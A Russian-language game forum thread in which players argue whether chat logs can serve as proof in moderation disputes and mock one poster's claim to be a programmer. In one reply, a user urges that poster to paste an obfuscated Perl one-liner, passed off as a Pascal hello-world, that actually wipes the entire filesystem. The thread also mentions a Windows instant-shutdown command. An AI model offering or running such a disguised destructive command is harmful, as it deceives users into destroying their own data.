Перейти к публикации

Скриншоты логов as proof...

Рекомендованные сообщения

• Ответы 175
  • Создано
  • Последний ответ

Лучшие авторы в этой теме

Лучшие авторы в этой теме

Опубликовано:

какой ты программист,ты даже писать не умеешь,зачем каждый раз говорить что ты умеешь открывать паскаль и прописывать /shutdown -s -t  0 (ты же программист,знаешь что за команда,да?)

Опубликовано:

какой ты программист,ты даже писать не умеешь,зачем каждый раз говорить что ты умеешь открывать паскаль и прописывать /shutdown -s -t  0 (ты же программист,знаешь что за команда,да?)

предлагаю скачать програму линус и открыть кмд и написать там cat "programma 1 pascal helloworld" | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Он походу на ютубе посмотрел видео по программированию и уже решил, что он программист, аххаха

ясно еще один эксперт давай покажи свою програму если ты такой умный ага ага

Опубликовано:

к чему ты это вообще написал? хатьфу на тебя девачка, говорю как програмист. если ты ничего не знаешь, не высирайся в теме.

темболее ты не по теме написал за такое я бы давал бан?

Он походу на ютубе посмотрел видео по программированию и уже решил, что он программист, аххаха

я смотрю audiho и да я програмист не какай в теме?

Опубликовано:

Так логи подделать можно, а простые модераторы не имеют доступа, чтобы проверять логи игрока 

Опубликовано:

Так логи подделать можно, а простые модераторы не имеют доступа, чтобы проверять логи игрока 

да блин говорили уже в этой теме что скрины так же сложно как и логи подделать -_- я програмист как я уже говорил имею в этом мнении вес (но я не тяжелый вешу всего 55 кг самый легкий в класе))))

Опубликовано:

Разрешение предоставлять логи в качестве пруфов откроет только новый способ подставлять игроков и ничего хорошего это не даст, нажать на одну кнопку и сделать скриншот гораздо проще чем лезть в логи и фотографировать их. Другие способы подставы игроков требуют гораздо больше действий чем просто замена слов или букв в текстовике так что другие способы подставы сложнее простого редактирования текстовика. Логи пруфами НИКОГДА не будут. Модератор всё сделал верно.

Опубликовано:

Разрешение предоставлять логи в качестве пруфов откроет только новый способ подставлять игроков и ничего хорошего это не даст, нажать на одну кнопку и сделать скриншот гораздо проще чем лезть в логи и фотографировать их. Другие способы подставы игроков требуют гораздо больше действий чем просто замена слов или букв в текстовике так что другие способы подставы сложнее простого редактирования текстовика. Логи пруфами НИКОГДА не будут. Модератор всё сделал верно.

говорю в 50 раз что заменить логи по той же скорости как и заменить скриншот!!!

Опубликовано:

говорю в 50 раз что заменить логи по той же скорости как и заменить скриншот!!!

Ты же знаешь что это не правда, зачем ты это пишешь. Зачем добавлять лишний способ подстав? Их и так достаточно.

Опубликовано:

Ты же знаешь что это не правда, зачем ты это пишешь. Зачем добавлять лишний способ подстав? Их и так достаточно.

всм, тебе подтвердить надо? я готов мне не лень че хотел ведь я програмист я програму написал

Опубликовано: (изменено)

всм, тебе подтвердить надо? я готов мне не лень че хотел ведь я програмист я програму написал

Давай, я не против. Но всё равно понятно что изменить букву в текстовике легче и быстрее чем на фотографии.

Изменено пользователем vimerasha
Опубликовано:

ну "ЩЕТАЙ"
ты всегда говоришь что ты "программист",ты же даже пишешь с ошибками,а в процесах нельзя пропустить не одного символа,сомневаюсь что ты тот за кого себя выдаёшь,умение превращать блокнотик в .bat это не навыки программиста <3

Опубликовано:

ну "ЩЕТАЙ"

ты всегда говоришь что ты "программист",ты же даже пишешь с ошибками,а в процесах нельзя пропустить не одного символа,сомневаюсь что ты тот за кого себя выдаёшь,умение превращать блокнотик в .bat это не навыки программиста <3

ясно дефолт мнение о програмистах человека который им не является, уже один эксперт мне в лс дописывался и проиграл свой спор, ему было доказано что я програмист, теперь я это сделаю публично спецально для таких как ты щетающих что они сэксперты во всех областях блин...

(lambda f_a, f, o: [(print(line), print(line, file=o, flush=True, end="")) for line in f if any(x in line.lower() for x in f_a)])(input('>>>').split(","), open(input(">>>"), "r", errors="ignore"), open(input(">>>") + ".txt", "a"))

И ЧТО ВЫ ПОСЛЕ ЭТОГО СКАЖЕТЕ А?

недеюсь все кто зайдет в эту беседу перестанут пытатся усомниться в том что я програмист основываясь на своих гениальных выводах

Опубликовано: (изменено)

ну "ЩЕТАЙ"

Привет софорумник!

Теперь посчитаем твои ошибки. Но как так, ты же сам поливаешь гАвном(sic!) того, кто ошибается...

1. ПроцеССах... Как тут можно было ошибиться?(Даже форум ошибку подчеркивает.)

2. НИ одного символа... (Т.к. их нет.)

3. Сомневаюсь, что ты тот, за кого себя выдаешь... Запятые не поставил.

Как програмист(sic!), согласен с мнением игрока barsikus07?!

Изменено пользователем _makcxim_
Опубликовано:

ну ясно человек пустые слова говорит

Это пустая тема в которой ты доказываешь что букву в текстовике так же долго изменять как и на фото

Опубликовано:

Это пустая тема в которой ты доказываешь что букву в текстовике так же долго изменять как и на фото

если ты так считаешь то ты ничего не понял мое мнение как програмиста

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас
  • Сейчас на странице   0 пользователей

• Нет пользователей, просматривающих эту страницу.

• Создать...